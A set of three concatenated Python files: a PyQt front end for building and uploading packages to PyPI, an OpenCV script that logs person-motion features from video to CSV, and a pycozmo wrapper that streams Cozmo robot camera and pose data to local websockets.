"QPushButton#buildbtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.buildbtn.setObjectName("buildbtn")
self.uploadbtn = QtWidgets.QPushButton(Form)
self.uploadbtn.setGeometry(QtCore.QRect(300, 350, 251, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.uploadbtn.setFont(font)
self.uploadbtn.setStyleSheet("QPushButton#uploadbtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius:6px;\n"
"}\n"
"QPushButton#uploadbtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
"QPushButton#uploadbtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.uploadbtn.setObjectName("uploadbtn")
self.builbox_2 = QtWidgets.QLineEdit(Form)
self.builbox_2.setGeometry(QtCore.QRect(60, 310, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.builbox_2.setFont(font)
self.builbox_2.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.builbox_2.setEchoMode(QtWidgets.QLineEdit.Normal)
self.builbox_2.setObjectName("builbox_2")
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(60, 240, 131, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label.setFont(font)
self.label.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(240, 290, 111, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_2.setFont(font)
self.label_2.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_2.setObjectName("label_2")
self.label_3 = QtWidgets.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(60, 290, 111, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_3.setFont(font)
self.label_3.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(30, 36, 171, 20))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_4.setFont(font)
self.label_4.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(Form)
self.label_5.setGeometry(QtCore.QRect(30, 90, 171, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_5.setFont(font)
self.label_5.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 16px;")
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(Form)
self.label_6.setGeometry(QtCore.QRect(30, 160, 161, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_6.setFont(font)
self.label_6.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 17px;")
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(Form)
self.label_7.setGeometry(QtCore.QRect(240, 240, 171, 16))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.label_7.setFont(font)
self.label_7.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 15px;")
self.label_7.setScaledContents(True)
self.label_7.setObjectName("label_7")
self.pyversionbox = QtWidgets.QLineEdit(Form)
self.pyversionbox.setGeometry(QtCore.QRect(240, 260, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.pyversionbox.setFont(font)
self.pyversionbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.pyversionbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.pyversionbox.setObjectName("pyversionbox")
self.undertextbtn = QtWidgets.QPushButton(Form)
self.undertextbtn.setGeometry(QtCore.QRect(60, 650, 461, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.undertextbtn.setFont(font)
self.undertextbtn.setStyleSheet("QPushButton#undertextbtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius: 15px;\n"
"}\n"
"QPushButton#undertextbtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
"QPushButton#undertextbtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.undertextbtn.setObjectName("undertextbtn")
self.signedbox = QtWidgets.QCheckBox(Form)
self.signedbox.setEnabled(True)
self.signedbox.setGeometry(QtCore.QRect(230, 100, 111, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.signedbox.setFont(font)
self.signedbox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.signedbox.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 13px;")
self.signedbox.setChecked(True)
self.signedbox.setObjectName("signedbox")
self.fillbox = QtWidgets.QCheckBox(Form)
self.fillbox.setGeometry(QtCore.QRect(420, 250, 121, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.fillbox.setFont(font)
self.fillbox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.fillbox.setStyleSheet("color:rgba(255,255,255,0.5);\n"
"font-family: Courier New;\n"
"font-size: 17px;\n"
"border-radius:8px;")
self.fillbox.setChecked(True)
self.fillbox.setObjectName("fillbox")
self.versionupdate = QtWidgets.QCheckBox(Form)
self.versionupdate.setGeometry(QtCore.QRect(420, 300, 101, 31))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.versionupdate.sizePolicy().hasHeightForWidth())
self.versionupdate.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.versionupdate.setFont(font)
self.versionupdate.setLayoutDirection(QtCore.Qt.LeftToRight)
self.versionupdate.setStyleSheet("color:rgba(255,255,255,0.5);\n"
"font-family: Courier New;\n"
"font-size: 21px;\n"
"border-size: 0px;\n"
"")
self.versionupdate.setChecked(True)
self.versionupdate.setTristate(False)
self.versionupdate.setObjectName("versionupdate")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.browsebtn.setText(_translate("Form", "Browse"))
self.userbox.setText(_translate("Form", "username"))
self.passwordbox.setText(_translate("Form", "password"))
self.textBrowser.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Diwani Simple Striped\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:\'MS Shell Dlg 2\'; font-size:7.8pt;\"><br /></p></body></html>"))
self.versionbox.setText(_translate("Form", "0.0.0"))
self.buildbtn.setText(_translate("Form", "Build"))
self.uploadbtn.setText(_translate("Form", "Upload"))
self.builbox_2.setText(_translate("Form", "dist/*"))
self.label.setText(_translate("Form", "Version (NR)"))
self.label_2.setText(_translate("Form", "build (NR)"))
self.label_3.setText(_translate("Form", "dist (NR)"))
self.label_4.setText(_translate("Form", "pypi username (R)"))
self.label_5.setText(_translate("Form", "pypi password (R)"))
self.label_6.setText(_translate("Form", "Folder path (R)"))
self.label_7.setText(_translate("Form", "Python Version (NR)"))
self.pyversionbox.setText(_translate("Form", "0.0"))
self.undertextbtn.setText(_translate("Form", "Open folder"))
self.signedbox.setText(_translate("Form", "Stay signed"))
self.fillbox.setText(_translate("Form", "Auto fill"))
self.versionupdate.setText(_translate("Form", "AVU"))
class fuck_this_dumb_bug:
def __init__(self):
self.tw = TW()
class Form(QtWidgets.QWidget, Ui_Form):
def __init__(self, *args, **kwargs):
QtWidgets.QWidget.__init__(self, *args, **kwargs)
self.setupUi(self)
self.signedbox.setChecked(False)
self.buildbtn.clicked.connect(self.builed)
self.activestate()
self.setWindowTitle("Lib control")
self.undertextbtn.clicked.connect(self.openfolder)
self.pyversionbox.setEnabled(False)
self.uploadbtn.clicked.connect(self.upload)
self.builbox.setEnabled(False)
self.browsebtn.clicked.connect(self.getfolder)
self.pyversionbox.setText(systimatic.getpy())
self.textBrowser.setStyleSheet("color: #ffffff;\n"
"font-family: Courier New;\n"
"font-size: 14px;")
def openfolder(self):
return systimatic.openfolder(self.browsebox.text())
def upload(self):
def fthread():
self.undertextbtn.setText("working..")
self.disableallbtns()
records, status = TW().upload(self.browsebox.text(), self.userbox.text(), self.passwordbox.text(), self.builbox_2.text())
self.recordsloop(records)
self.enableallbtns()
self.default_status()
        # fthread re-enables the buttons itself once the upload finishes
        threading.Thread(target=fthread).start()
def getfolder(self):
self.browsebox.setText(systimatic.getfolder())
threading.Thread(target=self.versionloop, daemon=True).start()
return
def activestate(self):
def fthread():
while True:
if self.signedbox.checkState() == 2:
try:
if self.userbox.text() != "username" and self.passwordbox.text() != "password":
systimatic.writelog(self.userbox.text(), self.passwordbox.text())
else:
username, password = systimatic.getlogdata(
username=self.userbox.text(),
password=self.passwordbox.text())
self.userbox.setText(username)
self.passwordbox.setText(password)
except:
pass
time.sleep(1)
threading.Thread(target=fthread, daemon=True).start()
def builed(self):
def fthread():
self.undertextbtn.setText("working..")
self.disableallbtns()
            self.textBrowser.append("Running build function.")
            records, result = TW().builed(self.browsebox.text())
self.recordsloop(records)
self.enableallbtns()
self.default_status()
threading.Thread(target=fthread, daemon=True).start()
def recordsloop(self, records):
for rec in records:
try:
self.textBrowser.append(rec)
except:
pass
def change_status(self, status):
return self.undertextbtn.setText(status)
def default_status(self, status='Open Folder'):
return self.undertextbtn.setText(status)
def disableallbtns(self):
self.browsebtn.setEnabled(False)
self.buildbtn.setEnabled(False)
self.uploadbtn.setEnabled(False)
self.undertextbtn.setEnabled(False)
    def versionloop(self):
        # When "Auto fill" is checked, read the project's current version via
        # setupsys, show it in the version box, then write the edited value
        # back once the user changes it.
        def loop(old_version):
while True:
current_version = self.versionbox.text()
if old_version != current_version.replace(" ", ""):
self.textBrowser.append(f"updated version: {current_version}")
setupsys.setversion(self.browsebox.text(), current_version)
print("break")
break
time.sleep(1)
        while True:
            if self.fillbox.checkState() == 2:
                old_version = setupsys.getversion(self.browsebox.text())
                self.versionbox.setText(old_version)
                self.textBrowser.append(f"current version: {old_version}")
                loop(old_version)
            else:
                # avoid a busy-wait when "Auto fill" is unchecked
                time.sleep(1)
def enableallbtns(self):
self.browsebtn.setEnabled(True)
self.buildbtn.setEnabled(True)
self.uploadbtn.setEnabled(True)
self.undertextbtn.setEnabled(True)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
w = Form()
w.show()
sys.exit(app.exec_())
|
data_collect_haar.py
|
#!/usr/bin/env python3
# coding=utf-8
import cv2
import numpy as np
import csv
import time
from multiprocessing import Process
# Re-detecting the person after an interruption causes a sudden speed jump,
# because the speed is computed against the last frame that had a detection.
# The left/right edge checks currently have little effect.
class DataCollect(object):
def __init__(self, cam_id, video_name):
self.cam_id = cam_id
self.video_name = video_name
self.row = []
def _judge_move(self, cur_frame_inner, pre_frame_inner):
# gray_img = cv2.cvtColor(cur_frame_inner, cv2.COLOR_BGR2GRAY)
gray_img = cur_frame_inner
        gray_img = cv2.resize(gray_img, (500, 500))  # not sure whether this resize affects the motion check
gray_img = cv2.GaussianBlur(gray_img, (21, 21), 0)
if pre_frame_inner is None:
pre_frame_inner = gray_img
return pre_frame_inner
else:
img_delta = cv2.absdiff(pre_frame_inner, gray_img)
thresh = cv2.threshold(img_delta, 25, 255, cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh, None, iterations=2)
# image, contours, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
image, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for c in contours:
                if cv2.contourArea(c) < 500:  # sensitivity threshold
continue
else:
# print(cv2.contourArea(c))
# print("画面中有运动物体")
self.row.pop()
self.row.append('1')
break
pre_frame_inner = gray_img
return pre_frame_inner
    def _entropy(self, band):  # frame entropy measure
        hist, _ = np.histogram(band, bins=range(0, 256))
        hist = hist[hist > 0]
        # Note: this sums -log2(p) over the non-empty bins rather than the
        # Shannon entropy -sum(p * log2(p)); kept as-is so the collected data
        # stays comparable. See the sketch below for the standard formula.
        return -np.log2(hist / hist.sum()).sum()
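    # A minimal sketch (not used by the collection pipeline) of the standard
    # Shannon entropy, for comparison with _entropy above, which sums -log2(p)
    # without weighting by p.
    def _shannon_entropy(self, band):
        hist, _ = np.histogram(band, bins=range(0, 256))
        p = hist[hist > 0] / hist.sum()
        return float(-(p * np.log2(p)).sum())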
    def _process_rgb_delta(self, cur_frame_inner, entropy_last_inner):  # entropy jitter between consecutive frames
# b, g, r = cv2.split(cur_frame_inner)
# rgb_average = (self._entropy(r) + self._entropy(g) + self._entropy(b)) / 3
gray_average = self._entropy(cur_frame_inner)
if entropy_last_inner == 0:
self.row.append(0)
return gray_average
jitter = abs(gray_average - entropy_last_inner)
jitter = int(jitter)
# print("画面抖动数值:", jitter)
self.row.append(jitter)
return gray_average
def _cal_speed_location(self, cur_frame_inner, point_x_inner, point_y_inner,
smooth_times, speed_x, speed_y):
# cur_frame_inner = cv2.cvtColor(cur_frame_inner, cv2.COLOR_BGR2GRAY)
bodycascade = cv2.CascadeClassifier("haarcascade_upperbody.xml")
bodys = bodycascade.detectMultiScale(
cur_frame_inner,
            scaleFactor=1.08,  # smaller is slower but more likely to detect
            minNeighbors=2,  # smaller is slower but more likely to detect
minSize=(95, 80),
maxSize=(150, 180),
# minSize=(30, 30)
flags=cv2.CASCADE_SCALE_IMAGE
)
        if len(bodys) == 0:  # no body detected: speeds and camera triggers are all 0
            if point_x_inner == 0 and point_y_inner == 0:  # never detected before
                self.row.append(0)  # self-motion flag: no movement
                self.row.append(0)  # two speed components
                self.row.append(0)
                self.row.append(0)  # left/right edge triggers
                self.row.append(0)
            # apply smoothing
            else:  # a tracked point existed in earlier frames, so smooth over the gap
                if smooth_times >= 0:
                    self.row.append(1)  # self-motion flag: movement
                    self.row.append(speed_x)
                    self.row.append(speed_y)
                    self.row.append(0)  # left/right edge triggers
self.row.append(0)
smooth_times -= 1
point_x_inner += speed_x
point_y_inner += speed_y
x, y, w, h = point_x_inner+speed_x, point_y_inner+speed_y, 150, 120
p1 = (x, y)
p2 = (x + w, y + h)
cv2.rectangle(cur_frame_inner, p1, p2, (0, 255, 0), 2)
                else:  # already smoothed for 5 frames, stop smoothing
                    self.row.append(0)  # self-motion flag: no movement
                    self.row.append(0)  # two speed components
                    self.row.append(0)
                    self.row.append(0)  # left/right edge triggers
self.row.append(0)
else:
            smooth_times = -1  # a body was detected; 5 would re-arm smoothing, -1 disables it
            self.row.append(1)  # self-motion flag: movement
            # only the first detected body is recorded
print('Now face:', bodys)
x, y, w, h = bodys[0][0], bodys[0][1], bodys[0][2], bodys[0][3]
p1 = (x, y)
p2 = (x + w, y + h)
cv2.rectangle(cur_frame_inner, p1, p2, (0, 255, 0), 2)
            if point_x_inner == 0 and point_y_inner == 0:  # first frame right after a new detection
                # both speed components are 0
self.row.append(0)
self.row.append(0)
else:
v_updown = point_y_inner - p1[1]
v_leftright = p1[0] - point_x_inner
# print("横轴速度为:", v_leftright)
# print("纵轴速度为:", v_updown)
self.row.append(v_leftright)
self.row.append(v_updown)
speed_x = v_leftright
speed_y = v_updown
point_x_inner = p1[0]
point_y_inner = p1[1]
if p1[0] <= 50:
if p1[0] < 0:
self.row.append(50)
else:
self.row.append(50 - p1[0])
print("左边该开了", 50 - p1[0])
else:
self.row.append(0)
if p2[0] >= 590:
if p2[0] > 640:
self.row.append(50)
else:
self.row.append(p2[0] - 590)
print("右边该开了", p2[0] - 590)
else:
self.row.append(0)
return point_x_inner, point_y_inner, smooth_times, speed_x, speed_y
def data_collect(self):
        # state carried across the whole loop
        timecount_start = time.time()
        time_stamp = 1  # frame/time index
        pre_frame = None  # parameter 1: previous grayscale frame, used to detect moving objects
        entropy_last = 0  # parameter 2: previous frame's jitter value
        point_x, point_y = 0, 0  # parameter 3: initial position of the tracked point
        smooth = 0  # number of frames to smooth over
        speed_x_last, speed_y_last = 0, 0  # previous frame's speed, used for smoothing
camera = cv2.VideoCapture(self.video_name) # self.video_name
self.row = []
# file_name = str(datetime.datetime.now().strftime("%Y-%m-%d %H-%M-%S") + '_' + str(self.cam_id))
file_name = self.video_name[-25:-4]
        with open('data/data_' + file_name + '.csv', 'w', newline='') as file:  # newline='' avoids extra blank rows
f = csv.writer(file)
            # main loop: collect the parameters frame by frame
while True:
res, cur_frame = camera.read()
if res is not True:
break
                cur_frame = cv2.cvtColor(cur_frame, cv2.COLOR_BGR2GRAY)  # convert to grayscale
if cv2.waitKey(1) & 0xFF == 27:
break
                # parameter 0: time (currently just a frame counter)
                # time_now = str(datetime.datetime.now().strftime("%H%M%S%f"))
                # row.append(time_now[:-4])  # keep only two digits of the milliseconds
                self.row.append(time_stamp)
                time_stamp += 1
                print('------', time_stamp, '-------')
                # parameter 1: motion on/off flag
                self.row.append('0')  # assume no motion; changed to '1' when movement is detected
pre_frame = self._judge_move(cur_frame, pre_frame)
                # parameter 2: image jitter (entropy change)
entropy_last = self._process_rgb_delta(cur_frame, entropy_last)
                # parameter 3: speed and the corresponding camera on/off triggers
point_x, point_y, smooth, speed_x_last, speed_y_last = self._cal_speed_location(cur_frame,
point_x,
point_y,
smooth,
speed_x_last,
speed_y_last)
                # write one row
print(self.row)
f.writerow(self.row)
self.row = []
cv2.imshow(str(self.cam_id), cur_frame)
        # report total processing time and release resources
timecount_end = time.time()
print(self.cam_id, " time:", timecount_end - timecount_start)
camera.release()
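# Each CSV row written by data_collect() has the following columns (derived
# from the append order above; the column names here are descriptive and not
# part of the original file):
#   0: frame index (time_stamp)
#   1: motion flag from frame differencing ('0'/'1')
#   2: entropy jitter between consecutive frames
#   3: body-detected flag from the Haar cascade (0/1)
#   4: horizontal speed of the tracked body
#   5: vertical speed of the tracked body
#   6: left-edge trigger value (0-50)
#   7: right-edge trigger value (0-50)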
def start_collect(cam_id, video_name):
DataCollect(cam_id, video_name).data_collect()
if __name__ == "__main__":
global_start = time.time()
list_video_name = ["video/2cam_scene1/2017-08-07 18-00-50_0.avi"]
for i, name in enumerate(list_video_name):
p = Process(target=start_collect, args=(i, name))
p.start()
cv2.destroyAllWindows()
global_end = time.time()
print("global time:", global_end - global_start)
|
pycozmobot.py
|
import pycozmo
from pycozmo import Client, LiftPosition
from pycozmo.util import Pose, Vector3, Angle, Distance, Speed #, Rotation
import time
import threading
import math
from pycozmo.expressions import Amazement, Excitement, Happiness, Sadness, Anger, Boredom, Surprise
import quaternion
import io
import json
animations = {
"GREETING": "anim_greeting_happy_01",
"SNEEZE": "anim_petdetection_shortreaction_01",
"WHAT": "anim_vc_reaction_whatwasthat_01",
"WIN": "anim_majorwin",
"LOSE": "anim_majorfail",
"FACEPALM": "anim_hiccup_faceplant_01",
"BEEPING": "anim_explorer_drvback_loop_01",
"NEW_OBJECT": "anim_launch_cubediscovery",
"LOST_SOMETHING": "anim_energy_cubenotfound_01",
"REJECT": "anim_cozmosays_badword_01",
"FAILED": "anim_majorfail",
"EXCITED_GREETING": "anim_meetcozmo_celebration",
"TALKY_GREETING": "anim_greeting_happy_01"
}
emotions = {
"AMAZED": Amazement,
"PLEASED": Happiness,
"HAPPY": Excitement,
"UPSET": Sadness,
"ANGRY": Anger,
"BORED": Boredom,
"STARTLED": Surprise
}
class Cube:
def __init__(self, object_id):
self.object_id = object_id
self.is_visible = False
self.pose = Pose(0, 0, 0, angle_z=Angle(radians=0))
class CozmoWorld:
def __init__(self, cli):
self.light_cubes = {
1: Cube('1?'),
2: Cube('2?'),
3: Cube('3?')
}
available_objects = dict(cli.available_objects)
found_cubes = 0
for factory_id, obj in available_objects.items():
dir(obj)
if obj.object_type == pycozmo.protocol_encoder.ObjectType.Block_LIGHTCUBE1:
self.light_cubes[1] = Cube(obj.factory_id)
found_cubes += 1
elif obj.object_type == pycozmo.protocol_encoder.ObjectType.Block_LIGHTCUBE2:
self.light_cubes[2] = Cube(obj.factory_id)
found_cubes += 1
elif obj.object_type == pycozmo.protocol_encoder.ObjectType.Block_LIGHTCUBE3:
self.light_cubes[3] = Cube(obj.factory_id)
found_cubes += 1
else:
continue
dir(obj)
if found_cubes >= 3:
break
def custom_dir(c, add): return dir(type(c)) + list(c.__dict__.keys()) + add
class GetAttr:
"""Base class for attr accesses in `self._xtra` passed down to `self.default`"""
@property
def _xtra(self): return [o for o in dir(self.default) if not o.startswith('_')]
def __getattr__(self, k):
if k in self._xtra: return getattr(self.default, k)
raise AttributeError(k)
def __dir__(self): return custom_dir(self, self._xtra)
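# Hedged usage sketch (not part of the original module): GetAttr forwards any
# attribute lookup that misses on the wrapper to `self.default`, which is how
# RobotWithWorld below exposes the pycozmo Client API while adding `.world`.
def _getattr_delegation_example():
    class _Wrapped(GetAttr):
        def __init__(self, target):
            self.default = target
    w = _Wrapped(" hello ")
    return w.strip()  # resolved on the wrapped str via __getattr__ -> "hello"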
class RobotWithWorld(GetAttr):
def __init__(self, cli):
self.default = cli
self.world = CozmoWorld(cli)
#
# def __getattr__(self, name):
# return getattr(self.cli, name)
# raise AttributeError
# @property
# def pose(self):
# return self.default.pose
# def set_head_angle(self, angle: float, accel: float = 10.0, max_speed: float = 10.0, duration: float = 0.0):
# self.default.set_head_angle(angle, float, accel, max_speed, duration)
# def wrapper(*args, **kwargs):
# for delegate_object_str, delegated_methods in delegation_config.items():
# if called_method in delegated_methods:
# break
# else:
# __raise_standard_error()
#
# delegate_object = getattr(self, delegate_object_str, None)
#
# return getattr(delegate_object, called_method)(*args, **kwargs)
# return wrapper
class CozmoBot:
def __init__(self, aruco):
self._robot = None
self._origin = None
self._dataPubThread = None
self._camClient = None
self._wsClient = None
self._latest_image = None
self._aruco = aruco
def start(self, code):
from ws4py.client.threadedclient import WebSocketClient
self._camClient = WebSocketClient('ws://localhost:9090/camPub')
self._camClient.connect()
self._wsClient = WebSocketClient('ws://localhost:9090/WsPub')
self._wsClient.connect()
self._dataPubThread = threading.Thread(target=self.feedRobotDataInThread)
self._dataPubThread.daemon = True
self._dataPubThread.start()
# pycozmo.robot.Robot.drive_off_charger_on_connect = False
with pycozmo.connect(enable_procedural_face=False) as cli:
print('connected:')
# self._robot = cli
self._robot = RobotWithWorld(cli)
self._origin = self._robot.pose
# self.cubes_to_numbers = {}
# for key in self._robot.world.light_cubes:
# self.cubes_to_numbers[self._robot.world.light_cubes.get(key).object_id] = key
# self.resetCubes()
# self.resetCustomObjects()
self._latest_image = None
# print(self)
cli.add_handler(pycozmo.event.EvtNewRawCameraImage, self.on_camera_image)
cli.enable_camera(enable=True, color=True)
cli.load_anims()
bot = self
# import pycozmo
# print('running code:', code)
exec(code, locals(), locals())
def on_camera_image(self, cli, image):
# print('self.on_image', image)
self._latest_image = image
def feedRobotDataInThread(self):
print('Starting data feed')
while True:
if self._robot is None:
# print('No robot')
time.sleep(0.1)
continue
# Feed camera
image = self._latest_image
if image is None:
# print('No image')
time.sleep(0.1)
continue
fobj = io.BytesIO()
image.save(fobj, format="jpeg")
fobj.seek(0)
binaryImage = fobj.read()
if binaryImage is None:
continue
# print("sending image")
self._camClient.send(binaryImage, binary=True)
# Feed robot data
def getData(pose):
# Don't fail if one of the cubes has flat battery.
if not pose:
return {
'x': 0,
'y': 0,
'z': 0,
'rot': (0, 0, 0, 0)
}
pos = pose.position - self._origin.position
rot = quaternion.div(pose.rotation.q0_q1_q2_q3, self._origin.rotation.q0_q1_q2_q3)
return {
'x': pos.x,
'y': pos.y,
'z': pos.z,
'rot': rot
}
def getCubeData(num):
cube = self._robot.world.light_cubes.get(num)
data = getData(cube.pose)
data['seen'] = self.getCubeSeen(num)
data['visible'] = self.getCubeIsVisible(num)
return data
data = {
'cozmo': getData(self._robot.pose),
'cubes': [
getCubeData(1),
getCubeData(2),
getCubeData(3)
]
}
self._wsClient.send(json.dumps(data))
# Sleep a while
time.sleep(0.1)
def resetCubes(self):
'''
Resets position of all cubes to make them "not yet seen".
'''
for key in self._robot.world.light_cubes:
cube = self._robot.world.light_cubes.get(key)
# Don't fail if one of the cubes has flat battery.
if cube.pose:
cube.pose._position = Vector3(0, 0, 0)
def resetCustomObjects(self):
# self._robot.world.delete_all_custom_objects()
return True
def playAnimation(self, animation):
self._robot.play_anim(animations[animation])
self._robot.wait_for(pycozmo.event.EvtAnimationCompleted)
def playEmotion(self, emotion):
f = emotions[emotion]()
f.render()
def lift(self, height):
'''
height - float, 0=bottom to 1=top
'''
self._robot.set_lift_height(LiftPosition(ratio=height).height.mm)
def head(self, angle):
'''
angle - degrees (low=-25, high=44.5)
'''
self._robot.set_head_angle(Angle(degrees=angle).radians)
    def getCubeNumber(self, cube):
        # NOTE: self.cubes_to_numbers is only built in the commented-out block in
        # start(), so this lookup will raise AttributeError until that is restored.
        return self.cubes_to_numbers.get(cube.object_id)
def getCubeSeen(self, cube_num):
'''
Returns whether cube has been seen since program start.
'''
cube = self._robot.world.light_cubes[cube_num]
if cube.pose:
pos = cube.pose.position.x_y_z
return not (pos == (0.0, 0.0, 0.0))
else:
return False
def getCubeIsVisible(self, cube_num):
'''
Returns whether cube is visible (in the view).
'''
cube = self._robot.world.light_cubes[cube_num]
if cube:
return cube.is_visible
else:
return False
def getDistanceToCube(self, cube_num):
'''
Returns the distance to the cube if it has been seen since the program start, or 100000 otherwise.
'''
if not self.getCubeSeen(cube_num):
return 100000
cube = self._robot.world.light_cubes[cube_num]
pos = self._robot.pose.position - cube.pose.position
dist = math.sqrt(pos.x * pos.x + pos.y * pos.y + pos.z * pos.z) / 10.0
return dist
def getDistanceBetweenCubes(self, cube1_num, cube2_num):
'''
Returns the distance between two cubes if both have been seen since the program start, or 100000 otherwise.
'''
if not self.getCubeSeen(cube1_num) or not self.getCubeSeen(cube2_num):
return 100000
cube1 = self._robot.world.light_cubes[cube1_num]
cube2 = self._robot.world.light_cubes[cube2_num]
pos = cube1.pose.position - cube2.pose.position
dist = math.sqrt(pos.x * pos.x + pos.y * pos.y + pos.z * pos.z) / 10.0
return dist
def pickupCube(self, cube_num):
'''
Now this is tricky because the action is quite unreliable.
'''
# Ignore if cube has not been observed yet.
if not self.getCubeSeen(cube_num):
print("[Bot] Ignoring pickupCube() as the cube has not been observed yet")
return False
return False
# cube = self._robot.world.light_cubes[cube_num]
# # res = self._robot.pickup_object(cube).wait_for_completed()
# # print('pickupCube res:', res)
# res = None
# while res == None or (res.state == cozmo.action.ACTION_FAILED and res.failure_reason[1] in ["repeat", "aborted"]):
# # while res == None or res.state == cozmo.action.ACTION_FAILED:
# res = self._robot.pickup_object(cube).wait_for_completed()
# print('pickupCube res:', res)
# return res.state == cozmo.action.ACTION_SUCCEEDED
def placeCubeOnGround(self, cube_num):
if not self.getCubeSeen(cube_num):
print("[Bot] Ignoring placeCubeOnGround() as the cube has not been observed yet")
return False
return False
# cube = self._robot.world.light_cubes[cube_num]
# res = self._robot.place_object_on_ground_here(cube).wait_for_completed()
# return res.state == cozmo.action.ACTION_SUCCEEDED
def placeCubeOnCube(self, other_cube_num):
'''
Another unreliable action.
'''
if not self.getCubeSeen(other_cube_num):
print("[Bot] Ignoring placeCubeOnCube() as the cube has not been observed yet")
return False
return False
# print("[Bot] Executing placeCubeOnCube()")
# cube = self._robot.world.light_cubes[other_cube_num]
# # while res == None or (res.state == cozmo.action.ACTION_FAILED and res.failure_code in ["repeat", "aborted"]):
# # res = self._robot.go_to_object(cube, distance_mm(100)).wait_for_completed()
# # print(res)
# # if res.state == cozmo.action.ACTION_SUCCEEDED:
# # res = None
# res = None
# while res == None or (res.state == cozmo.action.ACTION_FAILED and res.failure_code in ["repeat", "aborted"]):
# res = self._robot.place_on_object(cube).wait_for_completed()
# print(res)
